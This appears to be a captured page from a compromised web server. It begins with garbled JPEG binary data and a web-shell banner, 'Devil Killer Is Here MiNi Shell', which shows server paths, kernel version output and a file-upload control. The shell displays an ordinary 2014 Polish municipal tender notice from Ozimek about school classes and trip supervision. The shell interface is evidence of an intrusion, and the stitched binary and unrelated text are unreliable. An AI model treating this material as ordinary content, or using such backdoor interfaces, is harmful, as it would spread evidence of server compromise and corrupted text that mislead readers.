JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140226/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140226/39165-N-2014.html

<p class="kh_header"><b>Ozimek: Przeprowadzenie zajęć edukacyjnych oraz sprawowanie opieki podczas wyjazdów edukacyjnych w ramach projektu: Szkoła pełna pomysłów</b><br>
<b>Numer ogłoszenia: 39165 - 2014; data zamieszczenia: 26.02.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Ozimka , ul. Ks. J. Dzierżona 4B, 46-040 Ozimek, woj. opolskie, tel. 77 46 22 869, faks 77 46 22 811.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ozimek.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie zajęć edukacyjnych oraz sprawowanie opieki podczas wyjazdów edukacyjnych w ramach projektu: Szkoła pełna pomysłów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest przeprowadzenie zajęć edukacyjnych oraz sprawowanie opieki podczas wyjazdów edukacyjnych i na baseny w projekcie Szkoła Pełna pomysłów. 2. Projekt współfinansowany jest przez Unię Europejską w ramach środków Europejskiego Funduszu Społecznego z Programu Operacyjnego Kapitał Ludzki, Priorytet IX Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2. Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych. 3. Zamówienie zostało podzielone na 15 części. Szczegółowy opis przedmiotu zamówienia poszczególnych części: Część 1 - Szkoła Podstawowa w Antoniowie. Opieka podczas wyjazdów na basen. Opieka będzie sprawowana wspólnie z Wykonawcą z części 2. Termin realizacji: II połowa roku szkolnego 2013/2014. Ilość uczestników 10 osób. Ilość godzin: 40 godzin opieki. Zaplanowano 10 wyjazdów, każdy po 4 godziny. Godzina opieki = godzina zegarowa 60 minut. Część 2 - Szkoła Podstawowa w Antoniowie. Opieka podczas wyjazdów na basen. Opieka będzie sprawowana wspólnie z Wykonawcą z części 1. Termin realizacji: II połowa roku szkolnego 2013/2014. Ilość uczestników 10 osób. Ilość godzin: 40 godzin opieki. Zaplanowano 10 wyjazdów, każdy po 4 godziny. Godzina opieki = godzina zegarowa 60 minut. Część 3 - Szkoła Podstawowa w Antoniowie. Przeprowadzenie zajęć wyrównawczych z języka polskiego W labiryncie ortografii. Termin realizacji: II połowa roku szkolnego 2013/2014. Ilość uczestników 4. Ilość godzin edukacyjnych (45 minut): 15 godzin. Część 4 - Szkoła Podstawowa w Antoniowie. Opieka podczas wyjazdu edukacyjnego do Centrum Nauki Kopernik w Warszawie. Opieka będzie sprawowana wspólnie z Wykonawcami z części 5 i 6. Termin realizacji: II połowa roku szkolnego 2013/2014.  Ilość uczestników 21 osób. Ilość godzin: 15 godzin opieki. Godzina opieki = godzina zegarowa 60 minut. Część 5 - Szkoła Podstawowa w Antoniowie. Opieka podczas wyjazdu edukacyjnego do Centrum Nauki Kopernik w Warszawie. Opieka będzie sprawowana wspólnie z Wykonawcami z części 4 i 6. Termin realizacji: II połowa roku szkolnego 2013/2014. Ilość uczestników 21 osób. Ilość godzin: 15 godzin opieki.  Godzina opieki = godzina zegarowa 60 minut. Część 6 - Szkoła Podstawowa w Antoniowie. Opieka podczas wyjazdu edukacyjnego do Centrum Nauki Kopernik w Warszawie. Opieka będzie sprawowana wspólnie z Wykonawcami z części 4 i 5. Termin realizacji: II połowa roku szkolnego 2013/2014. Ilość uczestników 21 osób. Ilość godzin: 15 godzin opieki. Godzina opieki = godzina zegarowa 60 minut. Część 7 - Szkoła Podstawowa w Krasiejowie. Opieka podczas wyjazdów na basen. Opieka będzie sprawowana wspólnie z Wykonawcą z części 8. Termin realizacji: II połowa roku szkolnego 2013/2014.  Ilość uczestników 15 osób. Ilość godzin: 40 godzin opieki. Zaplanowano 10 wyjazdów, każdy po 4 godziny. Godzina opieki = godzina zegarowa 60 minut. Część 8 - Szkoła Podstawowa w Krasiejowie. Opieka podczas wyjazdów na basen. Opieka będzie sprawowana wspólnie z Wykonawcą z części 7. Termin realizacji: II połowa roku szkolnego 2013/2014. Ilość uczestników 15 osób. Ilość godzin: 40 godzin opieki. Zaplanowano 10 wyjazdów, każdy po 4 godziny. Godzina opieki = godzina zegarowa 60 minut. Część 9 - Szkoła Podstawowa w Krasiejowie. Przeprowadzenie zajęć rewalidacyjnych dla uczniów z upośledzeniem umysłowym. Termin realizacji: II połowa roku szkolnego 2013/2014. Ilość uczestników: 2. Ilość godzin edukacyjnych (60 minut): 30 godzin. Część 10 - Publiczna Szkoła Podstawowa w Dylakach. Przeprowadzenie zajęć dydaktyczno-wyrównawczych z języka angielskiego. Termin realizacji: II połowa roku szkolnego 2013/2014. Ilość uczestników: 4. Ilość godzin edukacyjnych (45 minut): 10 godzin. Część 11 - Publiczna Szkoła Podstawowa w Dylakach. Przeprowadzenie zajęć dla uczniów zdolnych języka angielskiego (kółko). Termin realizacji: II połowa roku szkolnego 2013/2014. Ilość uczestników: 4. Ilość godzin edukacyjnych (45 minut): 10 godzin. Część 12 - Publiczna Szkoła Podstawowa w Dylakach. Opieka podczas wyjazdów na basen. Opieka będzie sprawowana wspólnie z Wykonawcą z części 13. Termin realizacji: II połowa roku szkolnego 2013/2014. Ilość uczestników 12 osób. Ilość godzin: 40 godzin opieki. Zaplanowano 10 wyjazdów, każdy po 4 godziny. Godzina opieki = godzina zegarowa 60 minut. 
Część 13 - Publiczna Szkoła Podstawowa w Dylakach. Opieka podczas wyjazdów na basen. Opieka będzie sprawowana wspólnie z Wykonawcą z części 12. Termin realizacji: II połowa roku szkolnego 2013/2014. Ilość uczestników 12 osób. Ilość godzin: 40 godzin opieki. Zaplanowano 10 wyjazdów, każdy po 4 godziny. Godzina opieki = godzina zegarowa 60 minut. Część 14 - Publiczna Szkoła Podstawowa w Szczedrzyku. Opieka podczas wyjazdu edukacyjnego do Centrum Nauki Kopernik w Warszawie. Opieka będzie sprawowana wspólnie z Wykonawcą z części 15. Termin realizacji: II połowa roku szkolnego 2013/2014. Ilość uczestników 12 osób. Ilość godzin: 15 godzin opieki. Godzina opieki = godzina zegarowa 60 minut. Część 15 - Publiczna Szkoła Podstawowa w Szczedrzyku. Opieka podczas wyjazdu edukacyjnego do Centrum Nauki Kopernik w Warszawie. Opieka będzie sprawowana wspólnie z Wykonawcą z części 14. Termin realizacji: II połowa roku szkolnego 2013/2014.  Ilość uczestników 12 osób. Ilość godzin: 15 godzin opieki. Godzina opieki = godzina zegarowa 60 minut. 4. W ramach prowadzenia zajęć Wykonawca zobowiązany jest do:  1) współpracy z dyrektorem szkoły, koordynatorem szkolnym, kierownikiem projektu, 2) przygotowania w formie pisemnej w terminie do 10 dni roboczych od daty zawarcia umowy (jednak nie później, niż w dniu rozpoczęcia zajęć) programu i planu pracy zajęć pozalekcyjnych obejmującego harmonogram oraz zakres zadania dla uczestników projektu Szkoła pełna pomysłów dla określonego typu zajęć i przedstawienia do akceptacji dyrektorowi szkoły, a następnie przekazania go koordynatorowi szkolnemu w dwóch egzemplarzach (jeden zostanie przekazany kierownikowi projektu), 3) realizacji zajęć zgodnie z opracowanym programem zaakceptowanym przez dyrektora szkoły, 4) prawidłowego i systematycznego prowadzenia dokumentacji projektu oraz comiesięcznego przekazywania koordynatorowi szkolnemu pisemnej informacji o stanie realizacji zajęć w tym liczbę zrealizowanych godzin, 5) przekazywania koordynatorowi szkolnemu na koniec każdego miesiąca konspektów zajęć, list obecności, kart czasu pracy, dokumentacji z wyjazdów (edukacyjnych, na naukę pływania), 6) informowania koordynatora szkolnego w formie pisemnej o uczniach, którzy ukończyli udział w zajęciach w celu bieżącego monitorowania wskaźników, 7) realizacji zajęć zgodnie z celem głównym i celami szczegółowymi projektu, 8) przestrzegania obowiązków, zaleceń i terminów wynikających z realizacji umowy; opieka nad uczniami podczas zajęć i wyjazdów edukacyjnych (jeśli dotyczy),  oraz przygotowanie dokumentacji wyjazdu zgodnie z regulaminem szkoły dbanie o bezpieczeństwo uczniów, 9) wspomagania promocji i ewaluacji projektu- informowania o współfinansowaniu projektu ze środków Europejskiego Funduszu Społecznego,  10) współpracy z dyrektorem szkoły i koordynatorem szkolnym w mierzeniu postępu uczniów w zakresie rezultatów projektu, 11) dbałości o stan pomieszczeń, sprzętu i urządzeń wykorzystywanych w trakcie realizacji projektu, 12) zwiększenia motywacji do nauki przez uczniów uczestniczących w projekcie, 13) bieżącego monitorowania  efektów zajęć i raportowanie o stanie realizacji zajęć, 14) wystawienia opinii raz na semestr dla każdego ucznia nt. stopnia zaspokojenia potrzeb edukacyjnych pod względem: a) wyrównania dysproporcji w nauce, b) wzrostu umiejętności, c) skorzystania z doradztwa i opieki pedagogicznej, 15) rzetelnego prowadzenia dokumentacji z realizowanych zajęć - dzienników zajęć i innych wymaganych dokumentów (listy obecności, karty czasu pracy, dokumentacji zdjęciowej), 16) przygotowania materiałów do przeprowadzenia zajęć we własnym zakresie, 17) stosowania we wszystkich materiałach logotypów Unii Europejskiej i Programu Operacyjnego Kapitał Ludzki zgodnie z księgą wizualizacji znajdującej się na stronie internetowej www.pokl.opole.pl, 18) informowanie na bieżąco koordynatora szkolnego o wszystkich zaistniałych problemach w realizacji projektu, 19) informowania dyrektora szkoły i koordynatora szkolnego o każdym przypadku uniemożliwiającym realizację zajęć zgodnie z harmonogramem, 20) oznaczenia sal, w których prowadzone są zajęcia logotypami Unii Europejskiej, 21) niezwłocznego udostępnienia dokumentacji z zakresu realizacji umowy na żądanie uprawnionemu przedstawicielowi Zamawiającego, dyrektorowi szkoły, organowi kontrolującemu, 22) zaspokojenia potrzeb chłopców i dziewcząt bez ograniczeń wynikających z płci - obowiązek uwzględniania w trakcie zajęć zasady równości szans w przekazywanych treściach, 23) przekazania na koniec realizacji projektu pełnej i uporządkowanej dokumentacji, 24) rozliczania zaliczek (jeśli dotyczy) pobranych z kasy urzędu po uprzednim uzyskaniu zgody Burmistrza na stosownym wniosku i złożeniu oświadczenia, iż w przypadku nie rozliczenia pobranej zaliczki wyraża się zgodę na potrącenie nie rozliczonej kwoty ze świadczeń wypłacanych, wydatkowania jej zgodnie z zapisami wniosku, przedłożenia rozliczenia pobranej zaliczki  wraz z załącznikami (faktury, rachunki) w terminie 10 dni od jej pobrania. Wypłata następnej zaliczki dopuszczalna jest dopiero po rozliczeniu się z wcześniej pobranej zaliczki.  5. W ramach sprawowania opieki podczas wyjazdów edukacyjnych i na basen Wykonawca jest zobowiązany do: 1) sprawowania opieki nad uczniami w zakresie higieny, zdrowia, wyżywienia oraz innych czynności opiekuńczych, 2) zapewnienie bezpieczeństwa uczniom oraz prowadzenie innych zadań zleconych przez organizatora wycieczki, 3) sprawdzania stanu liczbowego uczniów przed wyruszeniem z każdego miejsca pobytu oraz po przybyciu do punktu docelowego, 4) współpracy z osobą prowadzącą zajęcia, w ramach których organizowany jest wyjazd, dyrektorem szkoły podstawowej, koordynatorem szkolnym, kierownikiem projektu i jego zastępcą, 6. Wykonawca ponosi pełną odpowiedzialność za: 1) bezpieczeństwo uczniów w czasie trwania zajęć, 2) bezpieczeństwo uczniów podczas  wyjazdów edukacyjnych, 3) jakość i terminowość prowadzonych zajęć, 4) szkody wyrządzone przez swoje działania lub zaniechania podczas wykonywania przedmiotu umowy,  5) wykorzystanie materiałów dydaktycznych zakupionych przez Zamawiającego, w ramach projektu zgodnie z ich przeznaczeniem oraz dbałość o ich należyty stan,  6) należyte utrzymanie stanu nieodpłatnie udostępnionych przed Dyrektora Szkoły pracowni/sali, w której będą prowadzone zajęcia oraz użyczonego do prowadzenia zajęć sprzętu..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Dla każdej części: Zamawiający przewiduje udzielenie zamówień uzupełniających na zasadach określonych w art. 67 ust. 1 pkt 6 Ustawy z dnia 29 stycznia 2004r. - Prawo zamówień publicznych - do 50% wartości zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 15.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 27.06.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje sposobu dokonywania oceny spełnienia przedmiotowego warunku, ponieważ nie ma on zastosowania w niniejszym postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje sposobu dokonywania oceny spełnienia przedmiotowego warunku w sposób szczególny. Zamawiający oceni ww. warunek na podstawie oświadczenia - załącznik nr 1 do oferty</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje sposobu dokonywania oceny spełnienia przedmiotowego warunku w sposób szczególny. Zamawiający oceni ww. warunek na podstawie oświadczenia - załącznik nr 1 do oferty</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dla każdej z części 1-2, 4-8, 12-15 (sprawowanie opieki): warunek uznany zostanie za spełniony jeśli Wykonawca: wykaże, że posiada lub dysponuje osobą posiadającą przygotowanie pedagogiczne określone w rozporządzeniu Ministra Edukacji Narodowej z dnia 20 czerwca 2013 roku w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli (Dz. U. 2013 r., poz.1207). dla każdej z części: 3, 9-11 (prowadzenie zajęć): warunek uznany zostanie za spełniony jeśli Wykonawca: wykaże, że posiada kwalifikacje lub dysponuje osobą posiadającą kwalifikacje do prowadzenia zajęć, na które Wykonawca składa ofertę określone w rozporządzeniu Ministra Edukacji Narodowej z dnia 20 czerwca 2013 roku w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli (Dz. U. 2013 r., poz.1207).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje sposobu dokonywania oceny spełnienia przedmiotowego warunku w sposób szczególny. Zamawiający oceni ww. warunek na podstawie oświadczenia - załącznik nr 1 do oferty</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Ponadto obok dokumentów wymienionych w pkt 1 i 2 potwierdzających spełnienie warunków udziału w postępowaniu Wykonawca w każdej części składa: 1) ofertę, wg wzoru oferty, stanowiącego część II SIWZ; 2) listę podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informację o tym, że Wykonawca nie należy do grupy kapitałowej - załącznik nr 3 do oferty; 3) w przypadku, gdy Wykonawcy składają wspólną ofertę - dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego; Pełnomocnictwo należy dołączyć w oryginale bądź kopii, potwierdzonej za zgodność z oryginałem notarialnie; 4) zobowiązanie podmiotu trzeciego - w przypadku gdy Wykonawca w celu wykazania spełniania warunków udziału w postępowaniu polega na zasobach podmiotu trzeciego zgodnie z art. 26 ust. 2b ustawy Pzp, 5) jeżeli Wykonawca wykazując spełnianie warunków udziału w postępowaniu polega na zasobach innych podmiotów, a podmioty te będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określone w pkt 2 niniejszego rozdziału.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru wykonawcy, w szczególności wystąpienia co najmniej jednej z okoliczności wymienionych poniżej: 1) zmiany osoby prowadzącej zajęcia lub sprawującej opiekę, jednak z zastrzeżeniem, że osoba realizująca zajęcia lub sprawująca opiekę w ramach zastępstwa winna posiadać kwalifikacje określone dla danego typu zajęć lub warsztatów, 2) zmiany liczby godzin zajęć lub opieki, 3) zmiany liczby dzieci biorących udział w projekcie, 4) zmiany terminów organizowanych wyjazdów edukacyjnych i wyjazdów na basen, 5) zmiana wynagrodzenia, w przypadku ustawowej zmiany przepisów, 6) termin realizacji: w przypadku wystąpienia sytuacji niemożliwej do przewidzenia w chwili zawarcia umowy, a mającej wpływ na jej realizację, wstrzymania zajęć, z przyczyn niezależnych od Wykonawcy, przez uprawniony organ, 3. Warunkiem zmiany umowy będzie udokumentowany lub odpowiednio uzasadniony wniosek Stron umowy, a zmiana może nastąpić w przypadku, gdy jej wprowadzenie jest konieczne dla prawidłowej realizacji zamówienia, a druga Strona umowy wyrazi zgodę.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.ozimek.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy i Miasta w Ozimku, ul. ks. J. Dzierżona 4b, 46-040 Ozimek (pok. 118 I piętro).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.03.2014 godzina 10:00, miejsce: Urząd Gminy i Miasta w Ozimku, ul. ks. J. Dzierżona 4b, 46-040 Ozimek, BIURO PODAWCZE (parter).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany jest przez Unię Europejską w ramach środków Europejskiego Funduszu Społecznego z Programu Operacyjnego Kapitał Ludzki, Priorytet IX Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2. Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych..</p>
